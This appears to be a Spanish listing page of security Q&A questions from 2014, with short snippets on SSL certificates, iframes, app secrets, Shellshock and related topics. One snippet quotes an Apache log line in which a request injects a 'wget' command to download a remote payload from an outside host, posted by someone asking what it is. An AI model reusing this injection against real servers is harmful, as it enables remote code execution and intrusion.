Todas las preguntas

1
respuesta

El certificado SSL expiró en el dispositivo integrado (un cliente)

Necesito algunas entradas para el escenario cuando caduque el certificado que se almacena en el dispositivo incorporado en la red que es un cliente. A continuación se explica la configuración. La explicación de la configuración Un disposi...
pregunta 01.10.2014 - 05:03
2
respuestas

¿Se ha usado alguna vez una contraseña de texto simple en un tribunal de justicia como prueba de un delito?

Independientemente de cómo se obtuvo la contraseña (descifrado, hash mal, confesión): ¿Existen casos conocidos previos en los que el contenido de la contraseña se usó para probar el motivo o la culpa? O, mirándolo desde la perspectiva de...
pregunta 23.10.2014 - 17:20
2
respuestas

Preocupaciones de seguridad con iframes

¿Debo tener en cuenta algún problema de seguridad si deseo ofrecer a los usuarios la posibilidad de incrustar iframes (para cosas como videos de Youtube) en el contenido generado en mi sitio? El contenido generado por el usuario es editable por...
pregunta 19.10.2014 - 06:59
1
respuesta

¿Por qué usar "App Secret" en aplicaciones móviles?

Veo que algunos SaaS requieren importar "App Secret" en su aplicación también con "Application Key". Entiendo la "Clave de aplicación", pero no puedo entender el "Secreto de la aplicación". Aquí es por qué: Puedo descompilar la aplicación y...
pregunta 22.09.2014 - 13:30
3
respuestas

Registros de Apache, registro sospechoso de apach0day

hoy recibí esto 16X.XXX.XX.77 - - [28/Jul/2014:--:--:--] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 200 3596 "-" "chroot-apach0day" así que con HTTP_USER_AGENT: chroot-apach0day REQUEST_URI:...
pregunta 28.07.2014 - 19:28
1
respuesta

Esquema del token de autenticación / inicio de sesión

Según esta respuesta, un esquema de token de inicio de sesión válido consistiría en el nombre de usuario (U) el tiempo de emisión (T) y clave secreta K propiedad del servidor solamente La sugerencia es concatenar los valores de la s...
pregunta 30.07.2014 - 11:31
1
respuesta

encodeURIComponent en un atributo HTML sin comillas

Mi intuición es que lo siguiente debería ser atacable: $("<td><a href=somefile.php?url="+encodeURIComponent(somevar)+">Download Here</a></td>"); En contraste con $("<td><a href=\"somefile.php?url="+encodeU...
pregunta 27.08.2014 - 15:25
2
respuestas

¿Gitolite proporciona un vector de ataque para la vulnerabilidad de shellshock?

En la página de documentación de gitolite dice lo siguiente: "Sin embargo, antes de ejecutar el comando, sshd configura una variable de entorno llamada SSH_ORIGINAL_COMMAND que contiene el comando git real que envió su estación de trabajo. Es...
pregunta 25.09.2014 - 23:11
3
respuestas

Socket.IO Client Security

Soy nuevo en Node.js y Socket.IO. Según la documentación, el código del lado del cliente es algo así como: <script src="/socket.io/socket.io.js"></script> <script> var socket = io('http://localhost:3000'); socket.on('news...
pregunta 18.10.2014 - 18:44
1
respuesta

cambiando la distribución de forma segura, ¿existe una estrategia para obtener una imagen ISO de distro sin control?

Puedo verificar que un archivo iso de Ubuntu no esté dañado usando las claves públicas ya presentes y de confianza en mi sistema Ubuntu. Ahora quiero pasar de Ubuntu a Arch y me pregunto cómo puedo empezar a confiar en que la imagen descargad...
pregunta 21.09.2014 - 12:19